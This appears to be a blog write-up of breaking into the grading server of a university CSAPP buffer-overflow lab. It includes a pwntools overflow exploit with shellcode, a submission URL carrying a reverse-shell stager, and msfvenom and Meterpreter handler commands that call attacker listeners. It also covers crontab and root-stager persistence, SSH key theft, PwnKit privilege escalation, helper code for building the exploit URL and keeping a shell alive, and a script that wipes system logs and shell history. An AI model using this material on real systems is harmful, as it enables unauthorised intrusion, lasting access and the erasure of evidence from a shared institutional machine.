Pentesting CSAPP Lab 3


Source audit

Reversing the binary in IDA gives the submission format:

```text
http://10.12.13.30:18224/csapp/submitr.pl/?userid=<student ID>&password=<password>&lab=<any number>&result=1:<cookie>:<our output, the binary as space-separated hex bytes>&submit=submit
```

Local testing

First, use a python script to work out a payload that maxes out the CPU locally. The buffer address differs per student ID, so test it ahead of time and confirm that the RCE works; the CPU bomb goes into buf.

```python
from pwn import *                    # pwntools, to drive bufbomb interactively
context.arch = "i386"                # bufbomb is a 32-bit binary; asm() and p32() need this
context.log_level = "debug"          # debug mode: show every byte sent and received
# Wrap the lab binary and its arguments in a process object; "-s" means "submit"
p = process(["./bufbomb_", "-u", "2023302646", "-p", "666666", "-s"])
# attach(p, '''
# finish
# finish
# finish
# finish
# finish
# ''')  # attach gdb and break at the next interaction
# pause()  # pause; press any key to carry on
# Move the stack down first so the decoder stub's pushes do not overwrite the
# shellcode, which itself lives on the stack
buf = asm("sub esp,0x300")

buf += b"\xbf\x14\xe3\x39\x24\xda\xda\xd9\x74\x24\xf4\x58"
buf += b"\x33\xc9\xb1\x1f\x31\x78\x15\x83\xe8\xfc\x03\x78"
buf += b"\x11\xe2\xe1\x89\x33\x7a\x38\x95\xb3\x61\x69\x6a"
buf += b"\x6f\x0c\x8f\xdc\xe9\x59\x6e\xd1\x76\xce\x2b\x82"
buf += b"\x59\x92\xa2\x9c\xce\x56\x34\x3e\x45\xde\xd5\x2a"
buf += b"\x3f\xb8\x45\xfa\xe8\xb1\x84\xbf\xdb\x42\xc3\x80"
buf += b"\x9d\x5b\x85\x74\x63\x34\xbb\x75\x9b\xc4\xe3\x1f"
buf += b"\x9b\xae\x16\x69\x78\x1f\xd1\xa4\xff\xe5\x21\x4f"
buf += b"\xbd\x0d\x86\x02\xba\x68\xc8\x72\xc5\x8a\x41\x91"
buf += b"\x04\x61\x5d\x97\x64\x7a\xed\x6a\xa6\x03\x88\x55"
buf += b"\x40\x14\xc9\xdc\x50\x8d\x5f\xb4\x22\xad\x52\xc9"
buf += b"\xc6\x72\x14\xc8\x37\x93\x5c\xcd\xc7\x54\x9c\x75"
buf += b"\xc6\x54\x9c\x89\x04\xd4"

# 24 + 20 bytes of filler reach the saved return address, which is overwritten
# with an address (specific to this student ID) pointing at the shellcode that
# follows it. Uncomment "+ buf" to deliver the shellcode instead of just crashing.
payload = 24 * b"a" + b"b" * 20 + p32(0x55683b28)  # + buf

p.sendlineafter(":", payload)
p.interactive()                      # hand the session over to the user
```

Plug the student ID, password and payload into the submission format. The example below carries a reverse-shell stager rather than the CPU bomb; it only shows the shape.

```text
http://10.12.13.30:18224/csapp/submitr.pl/?userid=2023302753&password=666666&lab=123&result=1:335a79b1:61%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2061%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2062%2028%203b%2068%2055%2081%20ec%2000%2003%2000%2000%20ba%2067%2044%20c5%2016%20d9%20ee%20d9%2074%2024%20f4%205e%2031%20c9%20b1%201f%2031%2056%2015%2003%2056%2015%2083%20c6%2004%20e2%2092%202e%20cf%2048%206d%2074%2038%2097%20de%20c9%2094%2032%20e2%207d%207c%204a%2003%20b0%2001%20db%2098%2023%2008%20c4%2003%20a0%2064%2006%203b%20d7%203e%208f%20da%208d%20d8%20d7%204c%2003%2072%2061%208d%20e0%20b1%20f1%20c8%2027%2030%20eb%209c%20d3%20fe%2063%2082%201c%2001%2074%209a%2076%2001%201e%201f%200e%20e2%20ef%20d6%20dd%2065%208a%2028%20a4%20d8%207e%208f%20e5%2024%2038%20cf%2019%202b%203a%2046%20fa%20ea%20d1%2054%203c%200f%2029%20d4%20c3%201d%20b2%2091%20fc%20e6%20a3%20c2%2075%20f7%205d%2046%20ef%2048%205e%206b%2070%202d%20a1%200b%2073%20d1%20c3%2053%2072%202d%2004%20a3%20ce%202c%2004%20a3%2030%20e2%2084%200a&submit=submit
```

Requesting a URL of this shape crashes the server, so the RCE really is there.

The real attack

Now swap buf for a reverse-shell stager generated with msfvenom and rebuild the URL.
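The URL above was assembled by hand. The Python below is an added example, not code from the original post: it rebuilds the URL from a raw payload, reproducing the overflow layout of the local script (24 + 20 bytes of filler, the return address, then the shellcode) and encoding the result field the way submitr.pl expects, space-separated lowercase hex with the spaces percent-encoded. The server address, credentials, cookie and lab number are the values shown in the write-up; the six-byte stand-in shellcode (just the `sub esp,0x300` stub) and the newline bad-byte check are constructed for the example.

```python
# Added example: build the submitr.pl URL from a raw overflow payload.
# Server address, credentials, cookie and lab value are those shown in the
# write-up; the stand-in shellcode at the bottom is constructed.
import struct
from urllib.parse import quote, urlencode

SUBMIT_BASE = "http://10.12.13.30:18224/csapp/submitr.pl/?"


def overflow_payload(ret_addr: int, shellcode: bytes) -> bytes:
    """Same layout as the local pwntools script: 24 + 20 bytes of filler reach
    the saved return address, which is overwritten with ret_addr (little-endian,
    like p32), and the shellcode follows it."""
    return 24 * b"a" + 20 * b"b" + struct.pack("<I", ret_addr) + shellcode


def hex_result(payload: bytes) -> str:
    """Encode bytes as lowercase, space-separated hex: b'\\x28\\x3b' -> '28 3b'."""
    return " ".join(f"{b:02x}" for b in payload)


def has_bad_bytes(payload: bytes, bad: bytes = b"\n") -> bool:
    """bufbomb reads its input with Gets(), which stops at a newline, so a 0x0a
    anywhere in the payload truncates it (the reason for msfvenom -b "\\x0a")."""
    return any(b in payload for b in bad)


def build_submit_url(userid: str, password: str, cookie: str,
                     payload: bytes, lab: int = 123) -> str:
    """Assemble the GET request in the format recovered from the binary."""
    if has_bad_bytes(payload):
        raise ValueError("payload contains a newline byte; regenerate it with -b \"\\x0a\"")
    params = {
        "userid": userid,
        "password": password,
        "lab": lab,
        "result": f"1:{cookie}:{hex_result(payload)}",
        "submit": "submit",
    }
    # quote() turns spaces into %20 (urlencode's default quote_plus would give
    # '+'); ':' is kept literal so the field stays '1:<cookie>:<hex>'.
    return SUBMIT_BASE + urlencode(params, safe=":", quote_via=quote)


if __name__ == "__main__":
    # Constructed stand-in for real shellcode: the 'sub esp,0x300' stub only.
    stub = bytes.fromhex("81ec00030000")
    print(build_submit_url("2023302753", "666666", "335a79b1",
                           overflow_payload(0x55683b28, stub)))
```

With the real stager in place of the stub, the output is exactly the shape of the hand-built URL above; the bad-byte check fails early instead of letting a truncated payload reach the server.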

Catch the stager with msfconsole. LHOST and LPORT are the attacker-side listener and must be exactly the pair msfvenom baked into the payload; the handler here and the msfvenom command further down use different pairs (10.12.13.30:15213 versus 10.32.29.20:8010), so set the handler to match whichever payload is actually live.

```text
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 10.12.13.30
set LPORT 15213
exploit
```

The session was not stable: it connected and died straight away. The host is known to have perl and python, so write a python stager instead. The `-b "\x0a"` excludes newline bytes from the generated shellcode; bufbomb reads its input with Gets(), which stops at a newline, so a 0x0a inside the payload would truncate it.

```bash
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.32.29.20 LPORT=8010 -b "\x0a" -a x86 --platform linux -f python > shellcode.txt
```

Then connect to the python stager, which gives a shell that stays up indefinitely.

Upload a stager and register it as a scheduled task for a first pass at persistence:

```bash
crontab -e   # edit the scheduled tasks
```

Use an msf post-exploitation module to grab the SSH keys, which gives SSH access.

Privilege escalation

Then, one quiet night, started testing privilege escalation.

Came across a very handy privesc helper:

linux-exploit-suggester

Download

```bash
git clone https://github.com/The-Z-Labs/linux-exploit-suggester.git
```

Usage

```bash
# 1. Assess the current Linux box's exposure to publicly known vulnerabilities:
$ ./linux-exploit-suggester.sh
# 2. Show the state of the security features on the current machine:
$ ./linux-exploit-suggester.sh --checksec
# 3. Assess the kernel's exposure from a supplied 'uname' string (the output of uname -a):
$ ./linux-exploit-suggester.sh --uname <uname-string>
```

It turned up a privesc vulnerability with very wide reach:

CVE-2021-4034, the polkit (pkexec) local privilege escalation, also known as PwnKit

https://cloud.tencent.com/developer/article/1945253

Root obtained.

Persistence

Upload a stager into root's home directory as `.restart`.

Register it as a scheduled task. For a bind shell, wrap it in `timeout`; otherwise every run leaves yet another listener open and eventually nothing can connect at all.
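One way to keep a cron-launched listener from piling up, as an added example that is not from the original post: run it as a single instance under a file lock and with a hard time limit, so the next cron tick either finds the previous run still alive and exits, or starts a fresh one after the old one was killed. The lock path, the cron line and the time limit are assumptions for illustration, and the demo function runs constructed `sleep`/`true` commands in place of a real listener.

```python
# Added example: single-instance, time-limited wrapper for a cron-launched job.
# Lock path, cron line and time limit are illustrative assumptions.
import fcntl
import os
import subprocess
import tempfile


def run_guarded(lock_path: str, argv: list, timeout_s: float) -> str:
    """Run argv at most once at a time and for at most timeout_s seconds.

    Returns 'locked' if another instance still holds the lock, 'timeout' if the
    command was killed at the limit, or 'exited:<code>' when it finished."""
    with open(lock_path, "w") as lock:
        try:
            # Non-blocking exclusive flock: held by this fd, released on close.
            fcntl.flock(lock, fcntl.LOCK_EX | fcntl.LOCK_NB)
        except BlockingIOError:
            return "locked"
        try:
            proc = subprocess.run(argv, timeout=timeout_s)
        except subprocess.TimeoutExpired:
            # subprocess.run kills the child before raising, so both the port
            # and the lock are free again for the next cron tick.
            return "timeout"
        return f"exited:{proc.returncode}"


def demo() -> tuple:
    """Constructed demonstration with sleep/true instead of a real listener."""
    lock_path = os.path.join(tempfile.gettempdir(), "restart-demo.lock")
    timed_out = run_guarded(lock_path, ["sleep", "5"], timeout_s=1)
    with open(lock_path, "w") as holder:           # simulate a still-running instance
        fcntl.flock(holder, fcntl.LOCK_EX | fcntl.LOCK_NB)
        blocked = run_guarded(lock_path, ["true"], timeout_s=1)
    finished = run_guarded(lock_path, ["true"], timeout_s=1)
    return timed_out, blocked, finished


if __name__ == "__main__":
    # Assumed cron line, every minute, with the limit under 60 s so runs never overlap:
    #   * * * * * /usr/bin/python3 /root/.restart
    print(demo())   # ('timeout', 'locked', 'exited:0')
```

The same guard fits on one cron line with util-linux and coreutils, `* * * * * flock -n /root/.restart.lock timeout 50 /root/.restart`, which is what the advice above amounts to; the Python version just makes the three outcomes explicit.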

With persistence in place:

Clear traces (this version is not thorough: it does not clear the network-connection records; a more complete one to follow).

```bash
#!/usr/bin/bash
# Truncate the logs in place. ': >' truncates without writing anything, which
# matters for the binary files (wtmp, btmp, lastlog, utmp): 'echo >' leaves a
# stray 0x0a that is not a valid record.
: > /var/log/syslog
: > /var/log/messages
: > /var/log/httpd/access_log
: > /var/log/httpd/error_log
: > /var/log/xferlog
: > /var/log/secure
: > /var/log/auth.log
: > /var/log/user.log
: > /var/log/wtmp
: > /var/log/lastlog
: > /var/log/btmp
: > /var/run/utmp
rm -f ~/.bash_history    # was '~/./bash_history', which is not the history file
# The two lines below act on the shell running them, so source this script
# ('. ./clean.sh') rather than executing it in a child shell.
history -c               # drop the in-memory history
unset HISTFILE           # and stop it being written out on exit
```